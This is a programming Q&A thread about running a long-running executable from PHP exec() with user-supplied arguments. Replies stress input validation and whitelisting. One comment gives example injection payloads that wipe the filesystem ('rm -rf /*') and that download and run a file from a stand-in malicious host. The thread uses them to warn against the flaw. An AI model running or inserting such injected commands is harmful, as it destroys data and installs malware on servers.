# what are the best practice to run an executable on a server which takes parameters passed by a user?

Tags: php, cloud, saas

I want to run an exectable on an ubuntu server which takes the arguments from a user (say from a form), and this executable might take a long time to finish. I am currently using php exec() command to run the executable (let's call the executable myExecutable) and pass to it the arguments supplied by the user. 
Is there a better way to do it, especially keeping in mind that the executable might take a long time to finish?

Comment: The most important thing I got from this is that someone is going to pwn your server. Performance is entirely secondary in this matter: you absolutely need to validate and sanitize any parameters coming from the user. If at all possible, you should only accept parameters from a finite set of possibilities which you can check them against. Barring that you'll need to make sure they are properly escaped and if necessary make sure they don't include any options that you aren't willing to have used.

Comment: For instance, if you do `exec("mycmd " . $_GET["param"])` then someone will send `param=;rm -rf /*` or most likely something much worse (like `; wget -O virus http://somebot.net/some-virus; ./virus`)

Comment: You touched an important issue, but i am already making sure that i am not running the user input "directly". Just confused if running the executable through php is a good idea or is there some other method?

Answer (score 0):

as for the "long time" issue, I would close the connection to the client whenever logical, and continue processing the script behind the scenes.
https://stackoverflow.com/a/141026/2646455

as for running a script on your server that accepts user input as parameters, I would highly suggest you evaluate, reevaluate, and triple evaluate the necessity of dropping user input directly into a server script. If it is absolutely the only way to accomplish your goal, put SERIOUS thought into the security implications of such a goal.

I would probably write the script to accept flags. Then if the user-supplied flags exist build your commandline arguments based on that. But I would try to avoid at all costs dumping user input directly into a server script without somehow cleansing or filtering it.